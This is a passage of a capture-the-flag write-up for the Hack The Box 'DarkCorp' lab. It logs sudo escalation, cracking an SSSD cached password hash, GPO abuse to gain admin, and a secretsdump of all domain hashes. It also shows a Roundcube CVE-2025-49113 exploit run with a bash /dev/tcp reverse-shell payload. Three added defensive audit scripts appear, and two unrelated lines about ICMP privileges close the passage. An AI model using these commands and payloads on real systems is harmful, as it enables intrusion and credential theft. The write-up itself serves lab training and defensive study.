ebelford@drip:/tmp$ KRB5CCNAME=angela.w.adm.ccache ksu angela.w.adm
Authenticated angela.w.adm@DARKCORP.HTB
Account angela.w.adm: authorization for angela.w.adm@DARKCORP.HTB successful
Changing uid to angela.w.adm (1730401107)
angela.w.adm@drip:/tmp$ whoami
angela.w.adm
angela.w.adm@drip:/tmp$ sudo -l
Matching Defaults entries for angela.w.adm on drip:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User angela.w.adm may run the following commands on drip:
>>>> (ALL : ALL) NOPASSWD: ALL
angela.w.adm can run anything with sudo without a password, so root on drip follows directly.
2.4. shell as taylor.b.adm
2.4.1. krb5.keytab
Look at /etc/krb5.keytab: it holds the keys of this host's machine account, DRIP$, which keytabextract.py reads out directly:
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# keytabextract.py krb5.keytab
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
REALM : DARKCORP.HTB
SERVICE PRINCIPAL : DRIP$/
NTLM HASH : da20dd3cee2b5dee8b941a4d6d5010da
AES-256 HASH : 7c7ee0dfc75cfbf24039d50ccfc2bc9a8534c563df07958cd1eff3698465b8d3
AES-128 HASH : 46f5a964a403ffd59868a3b93a04af35
Nothing useful comes of it, though.
2.4.2. cache_credentials
Look at sssd.conf:
root@drip:/tmp# cat /etc/sssd/sssd.conf
[sssd]
services = nss, pam
domains = darkcorp.htb
[domain/darkcorp.htb]
id_provider = ad
>>>> cache_credentials = True
auth_provider = ad
access_provider = simple
default_shell = /bin/bash
use_fully_qualified_names= False
krb5_store_password_if_offline = True
simple_allow_groups = linux_admins
cache_credentials = True means that every domain user who has logged in to this host has a password hash cached in the local SSSD database.
The SSSD cache lives under /var/lib/sss/db/:
root@drip:/var/lib/sss/db# ls -a
. .. cache_darkcorp.htb.ldb ccache_DARKCORP.HTB config.ldb sssd.ldb timestamps_darkcorp.htb.ldb
Copy the files to Kali and query them with ldbsearch:
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp/sssd_caches]
└─# ldbsearch -H cache_darkcorp.htb.ldb '(cachedPassword=*)'
asq: Unable to register control with rootdse!
# record 1
dn: name=taylor.b.adm@darkcorp.htb,cn=users,cn=darkcorp.htb,cn=sysdb
createTimestamp: 1736373877
fullName: Taylor Barnard ADM
gecos: Taylor Barnard ADM
gidNumber: 1730400513
name: taylor.b.adm@darkcorp.htb
objectCategory: user
uidNumber: 1730414101
objectSIDString: S-1-5-21-3432610366-2163336488-3604236847-14101
uniqueID: 6780d137-c4a5-49c2-9240-47ae051365c6
originalDN: CN=Taylor Barnard ADM,CN=Users,DC=darkcorp,DC=htb
originalMemberOf: CN=gpo_manager,CN=Users,DC=darkcorp,DC=htb
originalMemberOf: CN=linux_admins,CN=Users,DC=darkcorp,DC=htb
originalMemberOf: CN=Remote Management Users,CN=Builtin,DC=darkcorp,DC=htb
originalModifyTimestamp: 20250108215501.0Z
entryUSN: 118872
adAccountExpires: 9223372036854775807
adUserAccountControl: 66048
nameAlias: taylor.b.adm@darkcorp.htb
isPosix: TRUE
lastUpdate: 1736373877
initgrExpireTimestamp: 0
ccacheFile: FILE:/tmp/krb5cc_1730414101_B5njUL
>>>> cachedPassword:
cachedPasswordType: 1
lastCachedPasswordChange: 1736373912
failedLoginAttempts: 0
lastOnlineAuth: 1736373912
lastOnlineAuthWithCurrentToken: 1736373912
lastLogin: 1736373912
memberof: name=Domain Users@darkcorp.htb,cn=groups,cn=darkcorp.htb,cn=sysdb
memberof: name=linux_admins@darkcorp.htb,cn=groups,cn=darkcorp.htb,cn=sysdb
memberof: name=gpo_manager@darkcorp.htb,cn=groups,cn=darkcorp.htb,cn=sysdb
dataExpireTimestamp: 1
distinguishedName: name=taylor.b.adm@darkcorp.htb,cn=users,cn=darkcorp.htb,cn=sysdb
# returned 1 records
# 1 entries
# 0 referrals
cachedPassword is a sha512crypt ($6$) hash of the user's password:
$6$5wwc6mW6nrcRD4Uu$9rigmpKLyqH/.hQ520PzqN2/6u6PZpQQ93ESam/OHvlnQKQppk6DrNjL6ruzY7WJkA2FjPgULqxlb73xNw7n5.:!QAZzaq1
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1800 (sha512crypt $6$, SHA512 (Unix))
Hash.Target......: $6$5wwc6mW6nrcRD4Uu$9rigmpKLyqH/.hQ520PzqN2/6u6PZpQ...Nw7n5.
The password cracks to !QAZzaq1.
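The two things that made this step possible are visible in plain text: cache_credentials (plus krb5_store_password_if_offline) in sssd.conf, and a cachedPassword attribute in the domain's cache .ldb file. The following script is an added example, not part of the original write-up, that audits both from the defender's side: it flags the offline-caching options in an sssd.conf, then walks ldbsearch output (LDIF) and reports which users carry a cached hash and which crypt(3) scheme it uses. The sssd.conf sample mirrors the one above; the LDIF sample, the user names and the hash value are constructed placeholders.

```python
"""Audit sssd.conf and ldbsearch (LDIF) output for cached domain credentials.

Added example; not code from the original write-up. Sample inputs are constructed.
"""
import configparser
import re

# Constructed sample modelled on the sssd.conf shown in the write-up.
SAMPLE_SSSD_CONF = """
[sssd]
services = nss, pam
domains = darkcorp.htb

[domain/darkcorp.htb]
id_provider = ad
cache_credentials = True
auth_provider = ad
access_provider = simple
default_shell = /bin/bash
use_fully_qualified_names= False
krb5_store_password_if_offline = True
simple_allow_groups = linux_admins
"""

# Constructed ldbsearch output; the user names and hash are placeholders.
SAMPLE_LDIF = """# record 1
dn: name=alice@example.htb,cn=users,cn=example.htb,cn=sysdb
name: alice@example.htb
objectCategory: user
cachedPassword: $6$saltsalt$PLACEHOLDERHASHVALUEx
cachedPasswordType: 1
lastCachedPasswordChange: 1736373912

# record 2
dn: name=bob@example.htb,cn=users,cn=example.htb,cn=sysdb
name: bob@example.htb
objectCategory: user

# returned 2 records
"""

# Options that make SSSD keep a crackable password hash on disk.
RISKY_OPTIONS = {
    "cache_credentials": "true",
    "krb5_store_password_if_offline": "true",
}

# crypt(3) prefixes -> hash scheme (hashcat mode noted for reference).
CRYPT_PREFIXES = {
    "$6$": "sha512crypt (hashcat 1800)",
    "$5$": "sha256crypt (hashcat 7400)",
    "$1$": "md5crypt (hashcat 500)",
}


def audit_sssd_conf(text):
    """Return (domain_section, option) pairs that enable offline credential caching."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text)
    findings = []
    for section in cp.sections():
        if not section.startswith("domain/"):
            continue
        for opt, risky_value in RISKY_OPTIONS.items():
            if cp.get(section, opt, fallback="false").strip().lower() == risky_value:
                findings.append((section, opt))
    return findings


def parse_ldif_records(text):
    """Split LDIF output into records: dicts of attribute -> list of values."""
    records, current = [], {}
    unfolded = re.sub(r"\n ", "", text)  # join folded continuation lines
    for line in unfolded.splitlines():
        if line.startswith("#"):          # "# record 1", "# returned N records"
            continue
        if not line.strip():              # blank line ends a record
            if current:
                records.append(current)
                current = {}
            continue
        attr, _, value = line.partition(":")
        current.setdefault(attr.strip(), []).append(value.strip())
    if current:
        records.append(current)
    return records


def cached_password_report(text):
    """Return {user: hash_scheme} for every record that carries a cachedPassword."""
    report = {}
    for rec in parse_ldif_records(text):
        if "cachedPassword" not in rec:
            continue
        name = rec.get("name", ["?"])[0]
        value = rec["cachedPassword"][0]
        scheme = next((s for p, s in CRYPT_PREFIXES.items() if value.startswith(p)), "unknown")
        report[name] = scheme
    return report


if __name__ == "__main__":
    for section, opt in audit_sssd_conf(SAMPLE_SSSD_CONF):
        print(f"[!] {section}: {opt} enables offline credential caching")
    for user, scheme in cached_password_report(SAMPLE_LDIF).items():
        print(f"[!] cached password hash for {user}: {scheme}")
```

On a real host, feed the script `/etc/sssd/sssd.conf` and the output of `ldbsearch -H /var/lib/sss/db/cache_<domain>.ldb '(cachedPassword=*)'`; the .ldb files are root-only, so anyone able to read them already has root, which is exactly why caching the password hash of a privileged admin account on a low-value member host is the risk to avoid.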
2.5. GPO Abuse
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp/sssd_caches]
└─# pygpoabuse.py 'darkcorp.htb/taylor.b.adm:!QAZzaq1' -gpo-id "652CAE9A-4BB7-49F2-9E52-3361F33CE786" -command 'net localgroup administrators taylor.b.adm /add' -f
SUCCESS:root:ScheduledTask TASK_247727e5 created!
[+] ScheduledTask TASK_247727e5 created!
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp/sssd_caches]
└─# nxc smb 172.16.20.1 -u taylor.b.adm -p '!QAZzaq1'
SMB 172.16.20.1 445 DC-01 [*] Windows Server 2022 Build 20348 x64 (name:DC-01) (domain:darkcorp.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 172.16.20.1 445 DC-01 [+] darkcorp.htb\taylor.b.adm:!QAZzaq1 (Pwn3d!)
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp/sssd_caches]
└─# evil-winrm -i 172.16.20.1 -u taylor.b.adm -p '!QAZzaq1'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\taylor.b.adm\Documents> cd ../
*Evil-WinRM* PS C:\Users\taylor.b.adm> cd ../administrator
*Evil-WinRM* PS C:\Users\administrator> cd desktop
*Evil-WinRM* PS C:\Users\administrator\desktop> type root.txt
c5282b342aec6d4633b2be128b4a2cbe
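pygpoabuse works by writing an immediate scheduled task into the GPO's Group Policy Preferences file (Machine\Preferences\ScheduledTasks\ScheduledTasks.xml under SYSVOL), which every machine the GPO applies to then runs as SYSTEM at the next policy refresh. The script below is an added example, not code from the write-up or from pygpoabuse: it parses such a ScheduledTasks.xml and reports ImmediateTaskV2 entries and any task whose command line changes group membership or runs encoded PowerShell, the kind of check a defender can run periodically over SYSVOL. The XML is constructed to follow the Group Policy Preferences layout; its clsid/uid values, task names and the command are placeholders.

```python
"""Flag suspicious Group Policy Preferences scheduled tasks in ScheduledTasks.xml.

Added example; not code from the write-up or pygpoabuse. The sample XML is constructed.
"""
import re
import xml.etree.ElementTree as ET

# Constructed sample modelled on the GPP ScheduledTasks.xml layout; placeholders throughout.
SAMPLE_SCHEDULED_TASKS_XML = """<ScheduledTasks clsid="{CLSID-PLACEHOLDER}">
  <ImmediateTaskV2 clsid="{CLSID-PLACEHOLDER}" name="TASK_PLACEHOLDER" image="0"
      changed="2025-01-01 00:00:00" uid="{UID-PLACEHOLDER}">
    <Properties action="C" name="TASK_PLACEHOLDER" runAs="NT AUTHORITY\\System" logonType="S4U">
      <Task version="1.3">
        <Actions Context="Author">
          <Exec>
            <Command>cmd.exe</Command>
            <Arguments>/c net localgroup administrators someuser /add</Arguments>
          </Exec>
        </Actions>
      </Task>
    </Properties>
  </ImmediateTaskV2>
  <TaskV2 clsid="{CLSID-PLACEHOLDER}" name="Nightly Cleanup" image="0"
      changed="2024-06-01 00:00:00" uid="{UID-PLACEHOLDER}">
    <Properties action="C" name="Nightly Cleanup" runAs="NT AUTHORITY\\System" logonType="S4U">
      <Task version="1.3">
        <Actions Context="Author">
          <Exec>
            <Command>C:\\Scripts\\cleanup.cmd</Command>
            <Arguments></Arguments>
          </Exec>
        </Actions>
      </Task>
    </Properties>
  </TaskV2>
</ScheduledTasks>
"""

# Command-line patterns that warrant a closer look when pushed via GPO.
SUSPICIOUS_PATTERNS = [
    (re.compile(r"\bnet1?\s+(localgroup|group|user)\b", re.I), "account or group change via net.exe"),
    (re.compile(r"\bAdd-(Local)?GroupMember\b", re.I), "group membership change via PowerShell"),
    (re.compile(r"\s-(enc|encodedcommand)\b", re.I), "encoded PowerShell command line"),
]


def scan_scheduled_tasks(xml_text):
    """Return one finding per task that is an immediate task or runs a suspicious command."""
    findings = []
    for task in ET.fromstring(xml_text):
        props = task.find("Properties")
        if props is None:
            continue
        exec_el = props.find(".//Exec")
        command = exec_el.findtext("Command", default="") if exec_el is not None else ""
        arguments = exec_el.findtext("Arguments", default="") if exec_el is not None else ""
        command_line = f"{command} {arguments}".strip()
        reasons = []
        if task.tag.startswith("ImmediateTask"):
            reasons.append("immediate task: runs once on the next policy refresh")
        for pattern, label in SUSPICIOUS_PATTERNS:
            if pattern.search(command_line):
                reasons.append(label)
        if reasons:
            findings.append({
                "name": task.get("name", "?"),
                "kind": task.tag,
                "runAs": props.get("runAs", ""),
                "command_line": command_line,
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in scan_scheduled_tasks(SAMPLE_SCHEDULED_TASKS_XML):
        print(f"[!] {f['kind']} '{f['name']}' runAs={f['runAs']}: {f['command_line']}")
        for reason in f["reasons"]:
            print(f"    - {reason}")
```

In practice, point this at every ScheduledTasks.xml under \\<domain>\SYSVOL\<domain>\Policies\ and pair it with GPO version-number monitoring (the gPCMachineExtensionNames and versionNumber attributes change when a preference is added), since an ImmediateTaskV2 that appears in a GPO edited by a user who is not a normal GPO administrator is the signal to alert on.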
3. hashes
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp/sssd_caches]
└─# impacket-secretsdump 'darkcorp.htb/taylor.b.adm:!QAZzaq1@dc-01'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:fcb3ca5a19a1ccf2d14c13e8b64cde0f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:7c032c3e2657f4554bc7af108bd5ef17:::
victor.r:1103:aad3b435b51404eeaad3b435b51404ee:06207752633f7509f8e2e0d82e838699:::
svc_acc:1104:aad3b435b51404eeaad3b435b51404ee:01f55ea10774cce781a1b172478fcd25:::
john.w:1105:aad3b435b51404eeaad3b435b51404ee:b31090fdd33a4044cd815558c4d05b04:::
angela.w:1106:aad3b435b51404eeaad3b435b51404ee:957246c8137069bca672dc6aa0af7c7a:::
angela.w.adm:1107:aad3b435b51404eeaad3b435b51404ee:cf8b05d0462fc44eb783e3f423e2a138:::
taylor.b:1108:aad3b435b51404eeaad3b435b51404ee:ab32e2ad1f05dab03ee4b4d61fcb84ab:::
taylor.b.adm:14101:aad3b435b51404eeaad3b435b51404ee:0577b4b3fb172659dbac0be4554610f8:::
darkcorp.htb\eugene.b:25601:aad3b435b51404eeaad3b435b51404ee:84d9acc39d242f951f136a433328cf83:::
darkcorp.htb\bryce.c:25603:aad3b435b51404eeaad3b435b51404ee:5aa8484c54101e32418a533ad956ca60:::
DC-01$:1000:aad3b435b51404eeaad3b435b51404ee:45d397447e9d8a8c181655c27ef31d28:::
DRIP$:1601:aad3b435b51404eeaad3b435b51404ee:da20dd3cee2b5dee8b941a4d6d5010da:::
WEB-01$:20601:aad3b435b51404eeaad3b435b51404ee:8f33c7fc7ff515c1f358e488fbb8b675:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:97064b5e2ed9569a7a61cb6e71fd624e20de8464fc6d3f7f9c9ccd5ec865cd05
Administrator:aes128-cts-hmac-sha1-96:0424167c3041ed3b8df4ab1c996690c1
Administrator:des-cbc-md5:a1b004ad46dc19d9
krbtgt:aes256-cts-hmac-sha1-96:2795479225a152c8958119e8549079f2a59e101d84a3e464603a9cced55580d6
krbtgt:aes128-cts-hmac-sha1-96:183ebcd77ae33f476eb13c3f4404b98d
krbtgt:des-cbc-md5:7fe9e5ad67524001
victor.r:aes256-cts-hmac-sha1-96:84e79cb6b8959ebdda0dc73d2c6728bb9664d0d75c2aef702b0ea0a4126570bb
victor.r:aes128-cts-hmac-sha1-96:bc1fa04172b62be4428af05dcd4941af
victor.r:des-cbc-md5:62491fa740918316
svc_acc:aes256-cts-hmac-sha1-96:21ebfe2a41e5d614795ef004a06135748d5af03d0f2ca7fd6f6d804ac00f759a
svc_acc:aes128-cts-hmac-sha1-96:aebdba02d03943f17f553495f5f5e1d1
svc_acc:des-cbc-md5:5bec0bb54a405ed9
john.w:aes256-cts-hmac-sha1-96:6c0d89a7461f21150bbab0e4c9dea04ca4feb27a4f432c95030dbfa17f4f7de5
john.w:aes128-cts-hmac-sha1-96:16da7304c10a476b10a0ad301f858826
john.w:des-cbc-md5:e90b041f52b30875
angela.w:aes256-cts-hmac-sha1-96:25f7053fcfb74cf4f02dab4b2c7cb1ae506f3c3c09e4a5b7229b9f21a761830a
angela.w:aes128-cts-hmac-sha1-96:15f1467015c7cdd49ef74fd2fe549cf3
angela.w:des-cbc-md5:5b0168dacbc22a5e
angela.w.adm:aes256-cts-hmac-sha1-96:bec3236552b087f396597c10431e9a604be4b22703d37ae45cde6cd99873c693
angela.w.adm:aes128-cts-hmac-sha1-96:994dccb881c6a80c293cac8730fd18a2
angela.w.adm:des-cbc-md5:cb0268169289bfd9
taylor.b:aes256-cts-hmac-sha1-96:b269239174e6de5c93329130e77143d7a560f26938c06dae8b82cae17afb809c
taylor.b:aes128-cts-hmac-sha1-96:a3f7e9307519e6d3cc8e4fba83df0fef
taylor.b:des-cbc-md5:9b8010a21f1c7a3d
taylor.b.adm:aes256-cts-hmac-sha1-96:4c1e6783666861aac09374bee2bc48ba5ad331f3ac87e067c4a330c6a31dd71a
taylor.b.adm:aes128-cts-hmac-sha1-96:85712fd85df4669be88350520651cfe2
taylor.b.adm:des-cbc-md5:ce6176f4f4e5cd9e
darkcorp.htb\eugene.b:aes256-cts-hmac-sha1-96:33e0cf90ad3c5d0cd264207421c506b56b8ca9703b5be8c58a97169851067fd1
darkcorp.htb\eugene.b:aes128-cts-hmac-sha1-96:adf8b2743349be9684f8ec27df53fa92
darkcorp.htb\eugene.b:des-cbc-md5:2f5ef4b06b231afd
darkcorp.htb\bryce.c:aes256-cts-hmac-sha1-96:e835ec6b7d680472bdf65ac11ec17395930b5d778ba08481ef7290616b1fa7a8
darkcorp.htb\bryce.c:aes128-cts-hmac-sha1-96:09b1a46858723452ce11da2335b602b0
darkcorp.htb\bryce.c:des-cbc-md5:26d55b5849b6e623
DC-01$:aes256-cts-hmac-sha1-96:23f8c53f91fd2035d0dc5163341bd883cc051c1ba998f5aed318cd0d820fa1b2
DC-01$:aes128-cts-hmac-sha1-96:2715a4681263d6f9daf03b7dd7065a23
DC-01$:des-cbc-md5:8038f74f7c0da1b5
DRIP$:aes256-cts-hmac-sha1-96:7c7ee0dfc75cfbf24039d50ccfc2bc9a8534c563df07958cd1eff3698465b8d3
DRIP$:aes128-cts-hmac-sha1-96:46f5a964a403ffd59868a3b93a04af35
DRIP$:des-cbc-md5:d63120381a62dcc4
WEB-01$:aes256-cts-hmac-sha1-96:f16448747d7df00ead462e40b26561ba01be87d83068ef0ed766ec8e7dd2a12e
WEB-01$:aes128-cts-hmac-sha1-96:7867cb5a59da118ad045a5da54039eae
WEB-01$:des-cbc-md5:38e00bb3d901eaef
[*] Cleaning up...
4. Beyond Root
4.1. CVE-2025-49113
CVE-2025-49113 is an RCE vulnerability affecting Roundcube before 1.5.10 and 1.6.x before 1.6.11.
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp/CVE-2025-49113-exploit]
└─# php CVE-2025-49113.php http://mail.drip.htb admin admin 'bash -c "bash -i >& /dev/tcp/10.10.14.86/4444 0>&1"'
[+] Starting exploit (CVE-2025-49113)...
[*] Checking Roundcube version...
[*] Detected Roundcube version: 10607
[+] Target is vulnerable!
[+] Login successful!
[*] Exploiting...
──────────────────────────────────────────────────────────────────────────────────────────
┌──(root㉿kali)-[~/Desktop/htb/DarkCorp]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.86] from (UNKNOWN) [10.129.232.7] 63910
bash: cannot set terminal process group (507): Inappropriate ioctl for device
bash: no job control in this shell
www-data@drip:/$ whoami
whoami
www-data
www-data@drip:/$
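The exploit's first step is a version check, and the same check is what an administrator wants before patching: is the installed Roundcube inside the affected ranges quoted above (before 1.5.10, or 1.6.x before 1.6.11)? The function below is an added example, not code from the write-up or from the exploit. It accepts both a dotted version string and the numeric form the exploit printed; decoding 10607 as 1.6.7 assumes the encoding major*10000 + minor*100 + patch, which is an assumption rather than something the page states.

```python
"""Check a Roundcube version against the affected ranges quoted for CVE-2025-49113.

Added example; not code from the write-up or the exploit.
"""
import re

FIXED_1_5 = (1, 5, 10)   # first fixed release on the 1.5 branch
FIXED_1_6 = (1, 6, 11)   # first fixed release on the 1.6 branch


def parse_version(value):
    """Accept '1.6.7' or the numeric form '10607' and return (major, minor, patch)."""
    text = str(value).strip()
    if re.fullmatch(r"\d{5,6}", text):
        # Assumed encoding: major*10000 + minor*100 + patch (10607 -> 1.6.7).
        n = int(text)
        return (n // 10000, (n // 100) % 100, n % 100)
    m = re.fullmatch(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        raise ValueError(f"unrecognised version: {value!r}")
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def is_vulnerable_cve_2025_49113(value):
    """True if the version falls in 'before 1.5.10' or '1.6.x before 1.6.11'."""
    v = parse_version(value)
    if v < FIXED_1_5:
        return True
    return (1, 6, 0) <= v < FIXED_1_6


def fix_version_for(value):
    """Return the first fixed release for an affected version, or None if not affected."""
    if not is_vulnerable_cve_2025_49113(value):
        return None
    v = parse_version(value)
    return FIXED_1_6 if v >= (1, 6, 0) else FIXED_1_5


if __name__ == "__main__":
    for sample in ("10607", "1.6.11", "1.5.9", "1.5.10", "1.4.15"):
        fix = fix_version_for(sample)
        status = "affected, upgrade to %d.%d.%d" % fix if fix else "not affected"
        print(f"Roundcube {sample} ({'.'.join(map(str, parse_version(sample)))}): {status}")
```

The version the exploit reported on this box, 10607, decodes to 1.6.7 under that assumption and sits inside the 1.6.x range, which matches the "[+] Target is vulnerable!" line above; on a patched install the same check returns not affected.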
Sending raw ICMP packets (ping) on Linux/Windows normally requires raw-socket privileges.
A low-privilege agent usually lacks CAP_NET_RAW (Linux) or administrator rights (Windows) and therefore cannot craft ICMP packets.